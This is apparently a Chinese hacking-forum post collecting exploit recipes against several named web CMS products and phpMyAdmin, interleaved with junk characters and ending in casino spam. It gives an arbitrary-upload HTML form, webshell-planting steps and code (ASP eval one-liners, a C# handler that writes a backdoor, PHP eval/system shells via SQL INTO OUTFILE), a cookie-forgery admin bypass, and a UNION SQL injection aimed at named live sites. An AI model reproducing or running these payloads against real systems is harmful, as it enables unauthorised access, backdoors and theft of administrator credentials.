inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
" i; a1 M; z9 `! X- f7 M
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 M" \. t# o' B
' k, \* l. Z4 O, g8 `
YxShop易想购物商城4.7.1版本任意文件上传漏洞
2 G4 p7 Q8 y- a1 z- |3 {. S
, \+ k( ]9 `$ t1 l% e5 G/ ^: t7 f' g
http://xxoo.com/controls/fckedit
... aspx/connector.aspx
& H- j- ?0 k% K! X- ]6 |
跳转到网站根目录上传任意文件。
, p. n8 u! K( v4 d; u$ y
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
! k* M( ~7 L9 y
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
& C) ~* }% C* H9 U2 M6 s
Upload a new file:<br>
8 s; j% S$ ]1 `6 w- y- G
<input type="file" name="NewFile" size="50"><br>
% f, X2 t s$ [8 R: c- T
<input id="btnUpload" type="submit" value="Upload">
W3 v) v. J( Y1 Q9 u/ t7 f
</form>
* n2 F3 b9 s0 ^% a* r5 t3 v$ Y1 M
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" D3 Q) }% B y* E T2 c
4 F/ m# n+ ^6 }7 r' }
SDcms 后台拿webshell
/ D, ]* k: \% w8 F
7 Z$ U# a, Q( F
第一种方法:
" _, z" g6 Q6 T w% Q
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
% o+ ]) X9 {. M2 l [
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
; e8 Y7 w% X! ]; i0 Z0 [+ @
用菜刀链接
http://www.xxx.com/inc/const.asp
就搞定了。
: q# w* o, u+ c; O- z
第二种方法:
. h! z$ b4 ]' ^% e7 C
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
( y3 r4 y- Q7 U s
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
8 m5 r9 R1 M6 s+ D% t0 l
第三种方法:
+ I/ }; Q* Q9 r/ a
进入后台-->界面管理-->模板文件管理-->创建文件
1 Z0 C5 D7 p, X; p& r
文件名写入getshell.ashx
- q9 f2 y, Q* q7 {2 k, G! E! I. K
内容写入下面内容:
- d1 [+ s. H V- t) \, F* j" T6 ]8 `
/====================复制下面的=========================/
' Z: _1 e: @$ N" L! w7 X3 K
<%@ WebHandler Language="C#" Class="Handler" %>
5 j" x* ~& ^4 l! u5 p! T4 c
using System;
- g! q8 m4 k7 a( T
using System.Web;
4 N" k2 s: m g) T( S
using System.IO;
+ K. Y( H% k$ _7 }! k
public class Handler : IHttpHandler {
7 X2 F( ^8 O% J6 U1 ^+ r/ @" i
public void ProcessRequest (HttpContext context) {
/ b0 N9 Q7 V: u$ a) Y
context.Response.ContentType = "text/plain";
% z7 g4 ~+ d- e9 }0 @5 [, V
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
4 H$ v1 @ s0 _' m
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
0 u/ ^6 V7 c4 r# g# m
file1.Flush();
* W9 |! w0 W( N: a0 C J. s
file1.Close();
9 S7 ~; M* t; r8 r9 S$ A5 y
}
( m8 w t& i9 i R
public bool IsReusable {
7 n6 p+ E& }& J$ q
get {
( J$ ] h; {$ E0 e
return false;
: E: H* \+ c5 x. b9 |: B
}
$ e) t: b P) F. [
}
4 x+ Z$ j1 v% P- J( q6 g) H9 `
}
: {$ ?- o" f6 Z+ v$ b, u
/=============================================/
8 b8 u. U0 u* D. k
访问这个地址:
http://www.xxx.com/skins/2009/getshell.ashx
3 o7 Y# C! `. U
会在
http://www.xxx.com/skins/2009/
目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
* p" n: E8 \) O9 h: X0 a" v% h1 `
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) P7 R* d2 m* Q4 b# o+ A' T, S
% k: a9 X9 A, X9 q9 T7 v. V+ r
ESCMS网站管理系统0day
! u" C0 ?0 p& _
* g" j7 Z: o. t# g; z; k5 W
后台登陆验证是通过admin/check.asp实现的
V* J; {* n* _4 c
& R; [, r0 R$ j5 X m
首先我们打开
http://target.com/admin/es_index.html
h# c4 K$ S8 M
然后在COOKIE结尾加上
# L5 y3 |9 x' T- \
; ESCMS$_SP2=ES_admin=st0p;
' N# \( @) s% |7 j- g+ U5 j
修改,然后刷新
' T g/ e1 e0 f2 J+ w9 |+ ~: }
进后台了嘎..
( u( ?7 P+ Y' r" l! `& S7 ^
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
, {& O9 }" o! ?5 t& x
6 d k- d C" P. s: {# i
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
1 V. K7 m- a) ^3 Q1 T- A0 q$ L2 l
嘿嘿,成功了,shell地址为
http://target.com/admin/diy.asp
1 @1 Y+ s) w7 a2 U! q7 p
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
4 b1 s6 T# L$ m! t% t; |/ n; V
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
8 J8 P# ?- B/ O ~8 z E
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
! F4 s, {' Q! u Q& `7 C' a
3 g8 m* [8 L, A0 p) V& ]
宁志网站管理系统后台无验证漏洞及修复
A5 _( j2 N/ O6 q! ^
( c/ `, r' V7 t% R9 H3 w
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
' s9 a6 L' S9 L8 z5 a
官方网站:
www.ningzhi.net
( y9 G! s0 Y; i4 p! y' U
学校网站管理系统 V.2011版本
# i1 s- c/ g9 L- T
http://down.chinaz.com/soft/29943.htm
. q( | `- C1 h# W/ }& W2 z
其它版本(如:政府版等),自行下载.
% u3 W8 ?5 t9 d+ k+ }
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
1 k# D# T4 k% f* T9 U) J4 a: p
login.asp代码如下:
0 ]# M/ G7 p9 A! B% _
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
9 X1 m% R5 v" ~" R. k# {8 d
manage.asp代码我就不帖出来了.反正也没验证.
) _( M: x+ z7 n; S9 Z8 g1 \. F5 C
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
. o1 Z8 d1 V! u+ J5 y* g* V" K
漏洞利用:
5 X, c1 t- W8 g0 R7 W" S: R/ X6 R
直接访问
http://www.0855.tv/admin/manage.asp
+ B6 a: S* B/ H$ I1 K3 G, R, O
数据库操作:
http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
: e! j) v8 B; M& K1 V/ V* r3 A
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 D. G; j& b+ _
/ M2 w {) U0 a$ d+ z D
phpmyadmin拿shell的四种方法总结及修复
0 i# B7 P8 f- A
# \ F6 I3 {4 c2 d; \3 v
方法一:
( l6 e8 c& `% H" G$ J
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
6 Y& {; F6 `) x6 j: z/ Q! t& `
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
; J7 j7 c+ b( p7 a s& c" B
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
$ M. o' x% w9 F. l) m* [# d2 T
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
: O {! `6 x7 n
一句话连接密码:7on
% ~# y0 Q4 H2 ^1 ?
方法二:
! S, ]) h2 V! w' S! {( w q- w
读取文件内容: select load_file('E:/xamp/www/s.php');
: s/ m0 a# s3 s) {9 S: f+ [
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
. f% t- P9 t9 U; I: ?6 x: x% Y
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
! j4 K' G8 C! D/ o
方法三:
& I1 A& r4 S8 D5 o i" G
JhackJ版本 PHPmyadmin拿shell
, ~4 |+ f3 p$ b+ |& M' E
Create TABLE study (cmd text NOT NULL);
; O/ n; S! a' g/ M5 u$ ]8 ]
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
% v% E0 z6 S9 O
select cmd from study into outfile 'E:/wamp/www/7.php';
# J5 G8 B. j3 z2 I4 H
Drop TABLE IF EXISTS study;
5 J" K& l$ b& `1 i; ]
<?php eval($_POST[cmd])?>
5 \7 U3 j& P; A7 Z5 L, F5 ?- l" |
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
& n4 \" U$ ]! R- N4 @
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
4 p3 f1 p! J J4 U
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
! \3 V5 d! v5 Y. V
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
6 m) C Y2 `$ A
方法四:
3 k% r+ Y# S1 a: ^4 i( _% S' x
select load_file('E:/xamp/www/study.php');
E& v) w0 J) u, C# O
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
" Z/ U! q; z2 X9 }
然后访问网站目录:
http://www.2cto.com/study.php?cmd=dir
, K, ?9 w; V8 T: s) x' s
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
# ~! Y: u3 |9 G u8 W8 V9 T3 O- o; O
9 M! b" m# C; e( z2 g" i; H1 v5 K
NO.001中学网站管理系统 Build 110628 注入漏洞
/ l1 i1 o- ?; i: C8 ^1 T
5 n7 h3 e$ ~; t/ }
NO.001中学网站管理系统功能模块:
4 ]& F- [4 g0 F/ L
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
8 F: B6 f$ v C
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
) c# \0 C) s* v8 r( ^4 t% L
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
" S. z% [' W3 k% N% a. n
4.视频图片管理:一级分类,动态添加视频或者图片等信息
L% C, c& Q% B& Z; x: M; r0 ^+ c
5.留言管理:对留言,修改,删除、回复等管理
% m: z& }. @$ X5 J
6.校友频道:包括校友资料excel导出、管理等功能
% k3 _4 I/ R) y. z
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
- _ d4 E J' h" w& ^, D
默认后台:admin/login.asp
" {3 g- J3 H" n9 ^" ]5 x& e
官方演示:
http://demo.001cms.net
" o8 x' f# K, v" T7 d
源码下载地址:
http://down.chinaz.com/soft/30187.htm
% G& j& E3 V; [- W) n& w# z! c
EXP:
! ?) J: R& J3 x! z a" M9 B" ?
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
V; z' w2 G8 j" J3 M: b W
测试:
http://demo.001cms.net/shownews.asp?type=
新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
( a* }) W( Q( k& t+ P
getshell:后台有备份,你懂的
% j$ V2 r' N8 h9 _ E X
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
% j) g3 W4 l* e9 o* Z4 A
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
作者:
匿名
时间:
2017-10-28 08:21
casino slots
online casino canada
new online casino
slot machines
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2